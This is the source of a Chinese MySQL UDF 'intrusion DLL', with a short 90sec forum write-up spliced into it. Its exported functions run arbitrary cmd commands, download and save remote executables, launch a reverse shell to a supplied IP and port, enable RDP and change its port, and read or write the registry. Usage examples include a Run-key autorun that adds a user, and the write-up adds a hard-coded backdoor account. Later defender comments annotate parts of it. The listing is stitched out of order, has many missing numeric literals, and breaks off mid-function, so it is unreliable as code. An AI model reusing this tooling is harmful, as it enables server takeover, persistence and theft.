sprintf(initid->ptr,"未知的参数%s,期望为logoff、shutdown、reboot中的一个.\r\n",args->args[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
if(ExitWindowsEx(Flag,))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"成功执行.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
sprintf(initid->ptr,"执行失败,您的权限可能不足.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
}
// Frees the buffer from the last WindowsExit() call; buffers from earlier rows were never freed.
extern "C" __declspec(dllexport)void WindowsExit_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------BackShell
// Per-query init for BackShell: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool BackShell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for BackShell(<ip>, <port>): extracts embedded resource IDR_BIN2 to
 * %temp%\347win.exe and launches it through WinExec as
 * "<dropped exe> -e <system dir>\cmd.exe <ip> <port>". The help text calls this a reverse
 * shell; the embedded binary itself is not in this source. Unlike open3389, the dropped file
 * is never deleted, so %temp%\347win.exe remains on disk as an artifact, alongside the
 * mysqld.exe -> dropped exe -> cmd.exe process chain. Buffer sizes and the WinExec
 * comparison literal are missing from this listing.
 */
extern "C" __declspec(dllexport)char *BackShell(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=INT_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"反弹shell.\r\n例:select BackShell(\"your IP\",your port);");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH],cmd[];
DWORD size,size2;
 
// Fixed drop location.
GetEnvironmentVariable("temp",path,MAX_PATH-);
strcat(path,"\\347win.exe");
 
// Resource lookup through the module handle saved in DllMain.
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN2), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"查找资源出错,BackShell无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"载入资源出错,BackShell无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
hFile = CreateFile(path,GENERIC_WRITE,, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"创建临时文件出错,BackShell无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
// Writes `size` plus a stripped constant from the locked resource; LockResource and WriteFile
// results are unchecked. GlobalFree is not the documented release for a LoadResource handle.
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
// `path` is reused for cmd.exe after the dropped-file path has been copied into `cmd`.
strcpy(cmd,path);
GetSystemDirectory(path,MAX_PATH-);
strcat(path,"\\cmd.exe");
// sprintf uses `cmd` as both its destination and its first %s source (overlapping buffers);
// the port is MySQL's long long INT_RESULT printed with %d.
sprintf(cmd,"%s -e %s %s %d",cmd,path,args->args[],*((long long *) args->args[]));
// WinExec reports success through its documented threshold value, which the stripped
// comparison tests against. No handle is returned, so the child is never waited on.
if(WinExec(cmd,SW_HIDE)>)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"执行成功\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"执行失败\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
// Frees the buffer from the last BackShell() call; buffers from earlier rows were never freed.
extern "C" __declspec(dllexport)void BackShell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------about
// Per-query init for about: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool about_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
extern "C" __declspec(dllexport)char *about(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
memset(initid->ptr,,);
strcat(initid->ptr,"mysql 入侵必备dll 版本1.0.0.1\r\n\r\n");
strcat(initid->ptr,"程序经多次测试,不太可能会造成MYSQL假死.\r\n");
strcat(initid->ptr,"注意:要使用本dll你必须有对mysql的insert和delete权限以创建和删除函数。\r\n\r\n");
strcat(initid->ptr,"使用方法:\r\n");
strcat(initid->ptr,"创建函数:create function 函数名(区分大小写) returns string soname \"dll名\" (注意路径);\r\n");
strcat(initid->ptr,"删除函数:delete function 函数名;\r\n");
strcat(initid->ptr,"使用函数:select 函数名(参数列表);获取参数信息可使用select 函数名(\"help\");\r\n");
strcat(initid->ptr,"--------------------------------------------------------------------\r\n");
strcat(initid->ptr,"本dll包含的函数:\r\n");
strcat(initid->ptr,"cmdshell 执行cmd;\r\n");
strcat(initid->ptr,"downloader 下载者,到网上下载指定文件并保存到指定目录;\r\n");
strcat(initid->ptr,"open3389 通用开3389终端服务,可指定端口(不改端口无需重启);\r\n");

一点关于UDF的发散思路
Author:mer4en7y
Team:90sec
声明:UDF源码作者langouster

相信各位牛对UDF都不会陌生,看论坛叶总共享了一份UDF源码,以前一直没看过,于是看了看,写了这篇垃圾文章,在此抛砖引玉了,望大牛勿笑!
以cmdshell函数为例

cmdshell函数大家都不会陌生

// Excerpt of cmdshell() as quoted in the write-up: the shell image is resolved from the
// system directory and the output file from %temp%. The numeric literals and the path
// separators have been lost in this listing (compare the full source further down).
GetSystemDirectory(ShellPath,MAX_PATH-);
strcat(ShellPath,"cmd.exe");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-);
strcat(TempFilePath,"2351213.tmp");

这里调用的是system32下的cmd,如果删除了那么函数就会失败,我们如何来发散一下呢
其实工具只是一个辅助,看下面一段简单代码:
这是一段用API函数添加普通用户的代码,我将原先的about函数稍微修改一下,替换为下面的代码

// Fragment the author proposes to paste into about(): creates a local user with a fixed
// name/password via NetUserAdd on the local machine (NULL server). Only the success branch
// is shown; `initid` and `length` are about()'s UDF parameters. Numeric literals are missing
// from this listing and the "\r\n" in the success string has lost its backslashes.
// Defender note: a NetUserAdd issued by mysqld.exe shows up as a local account-creation
// event (4720) attributed to the database service account — an unusual source worth alerting on.
NET_API_STATUS ret=;
DWORD dwErr=;
USER_INFO_1 oUserInfo;
ZeroMemory(&oUserInfo,sizeof(oUserInfo));
oUserInfo.usri1_name=L"90sec";
oUserInfo.usri1_password=L"90sec";
oUserInfo.usri1_priv=USER_PRIV_USER;
oUserInfo.usri1_flags=UF_NORMAL_ACCOUNT;
ret=NetUserAdd(NULL,,(LPBYTE)(&oUserInfo),&dwErr);
if(ret== NERR_Success)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"执行成功rn");
*length=strlen(initid->ptr);
return initid->ptr;
}

udf.dll 源码

#include "stdafx.h"
#include "stdio.h"
#include <windows.h>
#include <tlhelp32.h>
#include <stdlib.h>
#include <winsock.h>
#include <Urlmon.h>
#include "mysql.h"
#include "resource.h"
#include "mydebug.h"
#pragma comment(lib, "Urlmon.lib")
HANDLE g_module; // DLL module handle saved in DllMain; read by FindResource/LoadResource in open3389 and BackShell
//---------------------------------------------------------- ---------------------------
// DLL entry point: on process attach, remembers the module handle in g_module so the
// resource-dropping functions below can locate their embedded binaries. Always returns TRUE.
BOOL APIENTRY DllMain(HINSTANCE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
{
if(ul_reason_for_call==DLL_PROCESS_ATTACH)
g_module=hModule;
return TRUE;
}
//-------------------------------------------------------------------------------- -----------------------cmdshell
// Per-query init for cmdshell: only advertises a maximum result length (literal lost in
// this listing). initid->ptr is not initialised here; the first cmdshell() call sets it.
extern "C" __declspec(dllexport)my_bool cmdshell_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for cmdshell(<command>): runs the string argument through cmd.exe with stdout
 * redirected to a temp file, then returns the file contents as the SQL result.
 * A new initid->ptr is malloc'd on every call and only the last one is freed in
 * cmdshell_deinit, so multi-row evaluation leaks one buffer per row.
 * Numeric literals (array/malloc sizes, CreateProcess flags, the wait timeout) are missing
 * from this listing, so buffer headroom cannot be verified from here.
 */
extern "C" __declspec(dllexport)char *cmdshell(UDF_INIT *initid, UDF_ARGS *args,
char *result, unsigned long *length,char *is_null, char *error)
{
 
// Wrong signature or the literal "help": return the usage text and run nothing.
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"执行CMD Shell函数.\r\n例:select cmdshell(\"dir c:\\\\\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
int RunStatus=;
char *cmdline,TempFilePath[MAX_PATH],ShellPath[MAX_PATH],temp[];
DWORD size=,len;
HANDLE hFile;
 
// Fixed locations: <system dir>\cmd.exe as the image and %temp%\2351213.tmp for output.
// mysqld.exe spawning cmd.exe, and this file name, are the host artifacts to key on.
GetSystemDirectory(ShellPath,MAX_PATH-);
strcat(ShellPath,"\\cmd.exe");
GetEnvironmentVariable("temp",TempFilePath,MAX_PATH-);
strcat(TempFilePath,"\\2351213.tmp");
 
// Builds " /c <argument>><tempfile>"; the argument is taken verbatim from the SQL caller.
// The malloc result is used unchecked.
cmdline=(char *)malloc(strlen(args->args[])+strlen(TempFilePath)+);
strcpy(cmdline," /c ");
strcat(cmdline,(args->args)[]);
strcat(cmdline,">");
strcat(cmdline,TempFilePath);
 
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.wShowWindow=SW_HIDE;
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
RunStatus=CreateProcess(ShellPath,cmdline,NULL,NULL,FALSE,,,,&si,&pi);
free(cmdline);
 
if(!RunStatus)
{
// Formats GetLastError into `temp`; the sprintf reads `temp` while writing into it
// (overlapping source and destination).
itoa(GetLastError(),temp,);
sprintf(temp,"Shell无法启动,GetLastError=%s\n",temp);
initid->ptr=(char *)malloc(strlen(temp)+);
strcpy(initid->ptr,temp);
(*length)=strlen(initid->ptr);
return initid->ptr;
}
 
// Blocks the mysqld worker thread until the child exits (timeout literal stripped).
// pi.hProcess and pi.hThread are never closed.
WaitForSingleObject(pi.hProcess,);
 
// collect the output
hFile=CreateFile(TempFilePath,GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,
OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,NULL);
if(hFile!=INVALID_HANDLE_VALUE)
{
// Whole file read into a buffer sized from GetFileSize plus a stripped constant; ReadFile's
// result and `len` are not checked, and the footer is then strcat'ed onto the same buffer.
size=GetFileSize(hFile,NULL);
initid->ptr=(char *)malloc(size+);
ReadFile(hFile,initid->ptr,size+,&len,NULL);
(initid->ptr)[size]='\0'
// (the statement above lacks its semicolon in this listing)
strcat(initid->ptr,"\r\n--------------------------------------------完成!\r\n");
 
// The output file is removed after reading.
CloseHandle(hFile);
DeleteFile(TempFilePath);
}
else
{
// Output file could not be opened: return only the footer.
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"\r\n--------------------------------------------完成!\r\n");
}
(*length)=strlen(initid->ptr);
return initid->ptr;
 
}
// Frees the buffer from the last cmdshell() call; buffers from earlier rows were never freed.
// (free(NULL) is a no-op, so the NULL test is redundant.)
extern "C" __declspec(dllexport)void cmdshell_deinit(UDF_INIT *initid)
{
if(initid->ptr!=NULL)
free(initid->ptr);
}
//---------------------------------------------------------------------------------------------------------------------------downloader
// Per-query init for downloader: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool downloader_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for downloader(<url>, <local path>): probes that the path is writable by creating
 * and deleting it, then fetches the URL into it with URLDownloadToFile (urlmon, linked by the
 * #pragma above; the call is synchronous). Argument indexes and malloc sizes are missing from
 * this listing. Host artifacts: a create/delete pair on the target path followed by a fresh
 * write, and an outbound HTTP fetch originating from mysqld.exe.
 */
extern "C" __declspec(dllexport)char *downloader(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(args->arg_count!= || args->arg_type[]!=STRING_RESULT || args->arg_type[]!=STRING_RESULT || stricmp(args->args[],"help")==)
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"下载者函数\r\n例:select downloader(\"http://www.baidu.com/server.exe\",\"c:\\\\winnt\\\\system32\\\\ser.exe\");\r\n参数中的\"\\\"要用\"\\\\\"代替.");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
HANDLE hFile;
char path[MAX_PATH];
 
// Unbounded copy of a caller-supplied path into a MAX_PATH stack buffer.
strcpy(path,(args->args)[]);
 
// Writability probe: create, close, delete.
hFile=CreateFile(path,GENERIC_WRITE,FILE_SHARE_READ, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc(+strlen(path));
sprintf(initid->ptr,"文件创建失败,请确认目录存在且有写权限(%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
CloseHandle(hFile);
DeleteFile(path);
 
// The result message echoes the path or the URL back to the SQL caller; malloc results
// are unchecked in both branches.
if(URLDownloadToFile(NULL,(args->args)[],path,,)==S_OK)
{
initid->ptr=(char *)malloc(+strlen(path));
sprintf(initid->ptr,"下载文件成功(%s).",path);
*length=strlen(initid->ptr);
return initid->ptr;
}
else
{
initid->ptr=(char *)malloc(+strlen((args->args)[]));
sprintf(initid->ptr,"下载文件出现错误,可能是网络原因(%s).",(args->args)[]);
*length=strlen(initid->ptr);
return initid->ptr;
}
 
}
// Frees the buffer from the last downloader() call; buffers from earlier rows were never freed.
extern "C" __declspec(dllexport)void downloader_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------open3389
// Per-query init for open3389: advertises a maximum result length (literal lost in this
// listing); initid->ptr is not initialised here.
extern "C" __declspec(dllexport)my_bool open3389_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
/*
 * UDF body for open3389([port]): extracts embedded resource IDR_BIN1 to %temp%\457391.exe,
 * runs it hidden, waits for it, deletes it, then — when a port argument was given — writes
 * PortNumber under the two Terminal Server registry keys below. What the dropped binary does
 * is not visible in this source. Host artifacts: the fixed temp file name, mysqld.exe creating
 * a child process, and RegSetValue on the RDP-Tcp / rdpwd\Tds\tcp keys.
 * Numeric literals (argument counts/indexes, sizes, flags, timeouts) are missing from this listing.
 */
extern "C" __declspec(dllexport)char *open3389(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
if(!(args->arg_count== ||(args->arg_count== && args->arg_type[]==INT_RESULT)))
{
initid->ptr=(char *)malloc();
if(initid->ptr==NULL)return NULL;
strcpy(initid->ptr,"通用开3389终端服务.修改端口需重启后生效.\r\n例:select open3389([端口]);");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
HRSRC hrsrc1;
HGLOBAL hglobal1;
HANDLE hFile;
char path[MAX_PATH];
DWORD size,size2;
 
// Fixed drop location.
GetEnvironmentVariable("temp",path,MAX_PATH-);
strcat(path,"\\457391.exe");
 
// Resource lookup through the module handle saved in DllMain.
hrsrc1=FindResource((HMODULE)g_module, MAKEINTRESOURCE(IDR_BIN1), "BIN");
if(hrsrc1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"查找资源出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
size=SizeofResource((HMODULE)g_module, hrsrc1);
hglobal1=LoadResource((HMODULE)g_module, hrsrc1);
if(hglobal1==NULL)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"载入资源出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
 
hFile = CreateFile(path,GENERIC_WRITE,, NULL,CREATE_ALWAYS,,NULL);
if(hFile==INVALID_HANDLE_VALUE)
{
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"创建临时文件出错,open3389无法继续运行.");
*length=strlen(initid->ptr);
return initid->ptr;
}
// Writes `size` plus a stripped constant from the locked resource; LockResource and WriteFile
// results are unchecked. GlobalFree is not the documented release for a LoadResource handle.
WriteFile(hFile,(LPVOID)LockResource(hglobal1),size+,&size2,NULL);
CloseHandle(hFile);
GlobalFree(hglobal1);
 
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory( &si, sizeof(si) );
si.wShowWindow=SW_HIDE;
si.cb = sizeof(si);
ZeroMemory( &pi, sizeof(pi) );
// Runs the dropped file with no command line; pi.hProcess/pi.hThread are never closed.
bool RunStatus=CreateProcess(path,NULL,NULL,NULL,FALSE,,,,&si,&pi);
if(!RunStatus)
{
DeleteFile(path);
initid->ptr=(char *)malloc();
strcpy(initid->ptr,"运行临时文件出错,您的权限可能不够.");
*length=strlen(initid->ptr);
return initid->ptr;
}
// Blocks the mysqld worker thread until the child exits (timeout literal stripped).
WaitForSingleObject(pi.hProcess,);
DeleteFile(path);
// change the port
if(args->arg_count!= && args->arg_type[]==INT_RESULT)
{
HKEY key;
DWORD dwDisposition;
// MySQL passes INT_RESULT as a long long; it is truncated to a DWORD here.
DWORD port=*((long long *) args->args[]);
 
// RegCreateKeyEx return values are unchecked — if a call fails, `key` is passed
// uninitialised to RegSetValueEx. RegSetValueEx returns ERROR_SUCCESS (0) on success,
// which is what the `!` tests rely on.
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
RegCreateKeyEx(HKEY_LOCAL_MACHINE ,"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp",,"",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,
NULL,&key,&dwDisposition);
if(!RegSetValueEx(key,"PortNumber",,REG_DWORD,(BYTE *)&port,sizeof(port)))
{
RegCloseKey(key);
initid->ptr=(char *)malloc();
// %d with a DWORD argument; malloc size stripped, result unchecked.
sprintf(initid->ptr,"成功开启3389终端服务....\r\n成功修改终端服务端口为%d,重启后生效,重启系统可利用WindowsExit函数.",port);
*length=strlen(initid->ptr);
return initid->ptr;
}
}
// Reached when either RegSetValueEx failed; `key` is whichever key was opened last.
RegCloseKey(key);
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"成功开启3389终端服务....\r\n修改终端服务端口失败.");
*length=strlen(initid->ptr);
return initid->ptr;
 
}
else
{
initid->ptr=(char *)malloc();
sprintf(initid->ptr,"成功开启3389终端服务.\r\n");
*length=strlen(initid->ptr);
return initid->ptr;
}
}
// Frees the buffer from the last open3389() call; buffers from earlier rows were never freed.
extern "C" __declspec(dllexport)void open3389_deinit(UDF_INIT *initid)
{
if(initid->ptr)
free(initid->ptr);
}
//--------------------------------------------------------------------------------------------------------------------------regread
/* Per-statement setup for regread(); MySQL calls it once before the first row.
 * No argument validation is done here (the UDF convention is to check
 * arg_count/arg_type in *_init and report through `message`); regread() instead
 * answers a malformed call with its usage text at row time.
 * NOTE(review): numeric literals were stripped from this listing — `max_length=**`
 * and the bare `return` are extraction damage, not the original tokens; by the
 * comment convention the function returns 0 (success). */
extern "C" __declspec(dllexport)my_bool regread_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
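/* Copy UDF string argument i into a bounded, NUL-terminated buffer.
 * MySQL does not guarantee NUL-terminated string arguments (args->lengths[i]
 * carries the length) and passes a NULL pointer for a SQL NULL; the original
 * used the raw pointers with strcmp/strcpy. */
static void regread_arg(const UDF_ARGS *args, unsigned i, char *dst, size_t cap)
{
    size_t n = 0;
    if (args->args[i] != NULL) {
        n = (size_t)args->lengths[i];
        if (n >= cap)
            n = cap - 1;
        memcpy(dst, args->args[i], n);
    }
    dst[n] = '\0';
}

/* Hand a heap copy of msg back to MySQL through initid->ptr (freed in regread_deinit).
 * On allocation failure the row is returned as SQL NULL instead of dereferencing NULL. */
static char *regread_reply(UDF_INIT *initid, unsigned long *length, char *is_null, const char *msg)
{
    size_t n = strlen(msg);
    initid->ptr = (char *)malloc(n + 1);
    if (initid->ptr == NULL) {
        *is_null = 1;
        return NULL;
    }
    memcpy(initid->ptr, msg, n + 1);
    *length = (unsigned long)n;
    return initid->ptr;
}

/* Map a root-key name to its HKEY; returns 0 when the name is unknown.
 * The original compared against "HKEY_CURRENT_USER " and "HKEY_USERS " (trailing
 * space), so those two roots could never be selected. */
static int regread_root(const char *name, HKEY *out)
{
    if (strcmp(name, "HKEY_LOCAL_MACHINE") == 0)
        *out = HKEY_LOCAL_MACHINE;
    else if (strcmp(name, "HKEY_CLASSES_ROOT") == 0)
        *out = HKEY_CLASSES_ROOT;
    else if (strcmp(name, "HKEY_CURRENT_USER") == 0)
        *out = HKEY_CURRENT_USER;
    else if (strcmp(name, "HKEY_USERS") == 0)
        *out = HKEY_USERS;
    else
        return 0;
    return 1;
}

/* regread(root, subkey, value_name): read a registry value and return its data as
 * text (up to the first NUL, as the original's strcpy did), or a usage/error message.
 * Runs under mysqld's own token, so it can read whatever the service account can.
 * Fixes relative to the original: the RegQueryValueEx size argument was passed
 * uninitialized, the data buffer was not guaranteed NUL-terminated before strcpy,
 * HKEYs were released with CloseHandle instead of RegCloseKey, a *read* went through
 * RegCreateKeyEx (creating the key path as a side effect), and the previous row's
 * result buffer was never freed. */
extern "C" __declspec(dllexport)char *regread(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
    static const char usage[] = "读注册表函数.\r\n例:select regread(\"HKEY_LOCAL_MACHINE\",\"SYSTEM\\\\ControlSet001\\\\Services\\\\W3SVC\\\\Parameters\\\\Virtual Roots\",\"/\");\r\n参数中的\"\\\"要用\"\\\\\"代替.";
    enum { ROOT_MAX = 32, SUBKEY_MAX = 256, VALUE_MAX = 512, DATA_MAX = 4096 };
    char root[ROOT_MAX], subkey[SUBKEY_MAX], value[VALUE_MAX];
    char msg[ROOT_MAX + 64];
    BYTE data[DATA_MAX];
    DWORD type = 0, size = sizeof data;
    HKEY hroot, hkey;
    LONG rc;

    /* One result buffer per call: release the previous row's before allocating again. */
    free(initid->ptr);
    initid->ptr = NULL;

    if (args->arg_count != 3 || args->arg_type[0] != STRING_RESULT
        || args->arg_type[1] != STRING_RESULT || args->arg_type[2] != STRING_RESULT
        || args->args[0] == NULL || args->args[1] == NULL || args->args[2] == NULL)
        return regread_reply(initid, length, is_null, usage);

    regread_arg(args, 0, root, sizeof root);
    regread_arg(args, 1, subkey, sizeof subkey);
    regread_arg(args, 2, value, sizeof value);
    if (stricmp(root, "help") == 0)
        return regread_reply(initid, length, is_null, usage);

    if (!regread_root(root, &hroot)) {
        _snprintf(msg, sizeof msg, "未知的注册表句柄:%s\r\n", root);
        msg[sizeof msg - 1] = '\0';
        return regread_reply(initid, length, is_null, msg);
    }

    /* Open read-only; a missing key is reported, never created. */
    rc = RegOpenKeyEx(hroot, subkey, 0, KEY_QUERY_VALUE, &hkey);
    if (rc != ERROR_SUCCESS)
        return regread_reply(initid, length, is_null, "找不注册表项\r\n");

    rc = RegQueryValueEx(hkey, value, NULL, &type, data, &size);
    RegCloseKey(hkey);
    if (rc == ERROR_MORE_DATA)
        return regread_reply(initid, length, is_null, "注册表值过长,无法读取\r\n");
    if (rc != ERROR_SUCCESS)
        return regread_reply(initid, length, is_null, "找不注册表值\r\n");

    /* A REG_SZ value is not guaranteed to include its terminator; terminate within
     * the buffer before treating the bytes as a C string. Non-string types come back
     * as raw bytes up to the first zero byte, exactly as before. */
    if (size >= sizeof data)
        size = sizeof data - 1;
    data[size] = '\0';
    return regread_reply(initid, length, is_null, (const char *)data);
}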
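/* Per-statement teardown for regread(): free the last result buffer and clear the
 * pointer so no dangling reference survives in UDF_INIT. free(NULL) is a no-op. */
extern "C" __declspec(dllexport)void regread_deinit(UDF_INIT *initid)
{
    free(initid->ptr);
    initid->ptr = NULL;
}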
//--------------------------------------------------------------------------------------------------------------------------regwrite
/* Per-statement setup for regwrite(); called once before the first row.
 * Arguments are not validated here (nothing is written to `message`); regwrite()
 * returns its usage text for a malformed call instead.
 * NOTE(review): numeric literals were stripped from this listing — `max_length=**`
 * and the bare `return` are extraction damage; by the comment convention the
 * function returns 0 (success). */
extern "C" __declspec(dllexport)my_bool regwrite_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{// return 1 on error, 0 on success
initid->max_length=**;
return ;
}
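/* Copy UDF string argument i into a bounded, NUL-terminated buffer. MySQL string
 * arguments are not guaranteed NUL-terminated (args->lengths[i] holds the length)
 * and a SQL NULL arrives as a NULL pointer. */
static void regwrite_arg(const UDF_ARGS *args, unsigned i, char *dst, size_t cap)
{
    size_t n = 0;
    if (args->args[i] != NULL) {
        n = (size_t)args->lengths[i];
        if (n >= cap)
            n = cap - 1;
        memcpy(dst, args->args[i], n);
    }
    dst[n] = '\0';
}

/* Return a heap copy of msg via initid->ptr (freed in regwrite_deinit); SQL NULL on OOM. */
static char *regwrite_reply(UDF_INIT *initid, unsigned long *length, char *is_null, const char *msg)
{
    size_t n = strlen(msg);
    initid->ptr = (char *)malloc(n + 1);
    if (initid->ptr == NULL) {
        *is_null = 1;
        return NULL;
    }
    memcpy(initid->ptr, msg, n + 1);
    *length = (unsigned long)n;
    return initid->ptr;
}

/* Root-key name -> HKEY; 0 when unknown. The original compared against
 * "HKEY_CURRENT_USER " / "HKEY_USERS " with a trailing space, so neither ever matched. */
static int regwrite_root(const char *name, HKEY *out)
{
    if (strcmp(name, "HKEY_LOCAL_MACHINE") == 0)
        *out = HKEY_LOCAL_MACHINE;
    else if (strcmp(name, "HKEY_CLASSES_ROOT") == 0)
        *out = HKEY_CLASSES_ROOT;
    else if (strcmp(name, "HKEY_CURRENT_USER") == 0)
        *out = HKEY_CURRENT_USER;
    else if (strcmp(name, "HKEY_USERS") == 0)
        *out = HKEY_USERS;
    else
        return 0;
    return 1;
}

/* REG_* type name -> registry type constant; 0 when unknown. Same set as the original. */
static int regwrite_type(const char *name, DWORD *out)
{
    static const struct { const char *name; DWORD type; } table[] = {
        { "REG_BINARY", REG_BINARY },
        { "REG_DWORD", REG_DWORD },
        { "REG_DWORD_LITTLE_ENDIAN", REG_DWORD_LITTLE_ENDIAN },
        { "REG_DWORD_BIG_ENDIAN", REG_DWORD_BIG_ENDIAN },
        { "REG_EXPAND_SZ", REG_EXPAND_SZ },
        { "REG_LINK", REG_LINK },
        { "REG_MULTI_SZ", REG_MULTI_SZ },
        { "REG_NONE", REG_NONE },
        { "REG_RESOURCE_LIST", REG_RESOURCE_LIST },
        { "REG_SZ", REG_SZ },
    };
    size_t i;
    for (i = 0; i < sizeof table / sizeof table[0]; i++) {
        if (strcmp(name, table[i].name) == 0) {
            *out = table[i].type;
            return 1;
        }
    }
    return 0;
}

/* regwrite(root, subkey, value_name, type_name, data): create the key if needed and
 * set the value. Runs under mysqld's token; the usage example writes an autorun
 * entry under HKLM\...\CurrentVersion\Run, i.e. this is a persistence primitive
 * worth monitoring on database hosts (registry-set events with mysqld as the writer).
 * Fixes relative to the original: RegCloseKey sat after the returns and never ran
 * (handle leak), RegCreateKeyEx's result was ignored, the data was always written as
 * text+NUL regardless of type (garbage for REG_DWORD*, no double terminator for
 * REG_MULTI_SZ), and the previous row's result buffer was leaked. Data is limited
 * to DATA_MAX bytes here. */
extern "C" __declspec(dllexport)char *regwrite(UDF_INIT *initid, UDF_ARGS *args,char *result, unsigned long *length,char *is_null, char *error)
{
    static const char usage[] = "写注册表函数.\r\n例:select regwrite(\"HKEY_LOCAL_MACHINE\",\"SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"adduser\",\"REG_SZ\",\"cmd.exe /c net user langouster langouster /add\");\r\n参数中的\"\\\"要用\"\\\\\"代替.";
    enum { ROOT_MAX = 32, SUBKEY_MAX = 256, NAME_MAX = 512, TYPE_MAX = 32, DATA_MAX = 4096 };
    char root[ROOT_MAX], subkey[SUBKEY_MAX], name[NAME_MAX], typname[TYPE_MAX];
    char data[DATA_MAX + 2];   /* +2 keeps a second NUL available for REG_MULTI_SZ */
    char msg[TYPE_MAX + 64];
    HKEY hroot, hkey;
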